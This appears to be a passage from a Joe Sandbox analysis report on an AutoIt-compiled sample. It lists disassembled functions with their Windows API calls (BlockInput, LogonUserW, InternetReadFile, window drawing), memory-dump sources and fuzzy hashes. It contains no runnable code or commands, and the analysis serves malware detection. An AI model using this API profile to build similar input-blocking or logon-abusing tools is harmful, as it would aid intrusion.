                                                            Download Yara Rule
                                                            APIs
                                                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                            • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                              • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                            • String ID:
                                                            • API String ID: 901099227-0
                                                            • Opcode ID: a84f1234d60d0bfd4ae1c18445e4b4f4e353c9d3ff10812a8b0aa1e25e6dfae4
                                                            • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                            • Opcode Fuzzy Hash: a84f1234d60d0bfd4ae1c18445e4b4f4e353c9d3ff10812a8b0aa1e25e6dfae4
                                                            • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                            Function 0047EA6F Relevance: 2.0, APIs: 1, Instructions: 502COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Proc
                                                            • String ID:
                                                            • API String ID: 2346855178-0
                                                            • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                            • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                            • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                            • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                            Function 0045A370 Relevance: 1.5, APIs: 1, Instructions: 24keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • BlockInput.USER32(00000001), ref: 0045A38B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: BlockInput
                                                            • String ID:
                                                            • API String ID: 3456056419-0
                                                            • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                            • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                            • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                            • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                            Function 00436CD7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: LogonUser
                                                            • String ID:
                                                            • API String ID: 1244722697-0
                                                            • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                            • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                            • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                            • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                            Function 00472C3F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: NameUser
                                                            • String ID:
                                                            • API String ID: 2645101109-0
                                                            • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                            • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                            • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                            • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                            Function 0041F250 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                            • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                            • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                            • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                            Function 0042200C Relevance: 1.4, Strings: 1, Instructions: 180COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: N@
                                                            • API String ID: 0-1509896676
                                                            • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                            • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                            • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                            • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                            Function 0040FA10 Relevance: .6, Instructions: 607COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                            • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                            • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                            • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                            Function 004129D0 Relevance: .4, Instructions: 355COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                            • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                            • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                            • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                            Function 004125E8 Relevance: .3, Instructions: 349COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                            • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                            • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                            • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                            Function 00412216 Relevance: .3, Instructions: 332COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                            • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                            • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                            • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                            Function 02E73620 Relevance: .1, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681999873.0000000002E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2e70000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                            • Instruction ID: 2ff2e1aabf76b4b6ce9e6fac83da9207d205769984c5da094a69b2b9704b3657
                                                            • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                            • Instruction Fuzzy Hash: 9441B5B1D1051CDBCF48CFADC991AEEBBF1AF88201F548299D516AB345D730AB41DB50
                                                            Function 02E734B0 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681999873.0000000002E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2e70000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                            • Instruction ID: 5505b8106e02a056046b43f0f3a23d0408809d4564cff27e78139e9a0cf90c6c
                                                            • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                            • Instruction Fuzzy Hash: 65019278A10109EFCB88DF98C5909AEF7B5FB48310F2085E9E919A7701E730AE41DB80
                                                            Function 02E73510 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681999873.0000000002E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2e70000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                            • Instruction ID: b587322e059baae9092eb2b8e9b60dedd7be8e2c92b281a878c0b9f6f6bd7f8a
                                                            • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                            • Instruction Fuzzy Hash: 1E019278A00109EFCB84DF98C5909AEF7B6FB48314F2086D9E819A7701D730AE41DB80
                                                            Function 02E71E70 Relevance: .0, Instructions: 6COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681999873.0000000002E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2e70000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                            • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                            • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                            • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                            Function 004594E9 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 490filewindowcomCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DeleteObject.GDI32(?), ref: 0045953B
                                                            • DeleteObject.GDI32(?), ref: 00459551
                                                            • DestroyWindow.USER32(?), ref: 00459563
                                                            • GetDesktopWindow.USER32 ref: 00459581
                                                            • GetWindowRect.USER32(00000000), ref: 00459588
                                                            • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                            • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                            • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                            • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                            • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                            • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                            • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                            • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                            • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                            • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                            • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                            • ShowWindow.USER32(?,00000004), ref: 00459865
                                                            • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                            • GetStockObject.GDI32(00000011), ref: 004598CD
                                                            • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                            • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                            • DeleteDC.GDI32(00000000), ref: 004598F8
                                                            • _wcslen.LIBCMT ref: 00459916
                                                            • _wcscpy.LIBCMT ref: 0045993A
                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                            • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                            • GetDC.USER32(00000000), ref: 004599FC
                                                            • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                            • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                            • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                            • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                            • API String ID: 4040870279-2373415609
                                                            • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                            • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                            • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                            • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                            Function 004417BF Relevance: 49.8, APIs: 33, Instructions: 275COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSysColor.USER32(00000012), ref: 0044181E
                                                            • SetTextColor.GDI32(?,?), ref: 00441826
                                                            • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                            • GetSysColor.USER32(0000000F), ref: 00441849
                                                            • SetBkColor.GDI32(?,?), ref: 00441864
                                                            • SelectObject.GDI32(?,?), ref: 00441874
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                            • GetSysColor.USER32(00000010), ref: 004418B2
                                                            • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                            • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                            • DeleteObject.GDI32(?), ref: 004418D5
                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                            • FillRect.USER32(?,?,?), ref: 00441970
                                                              • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
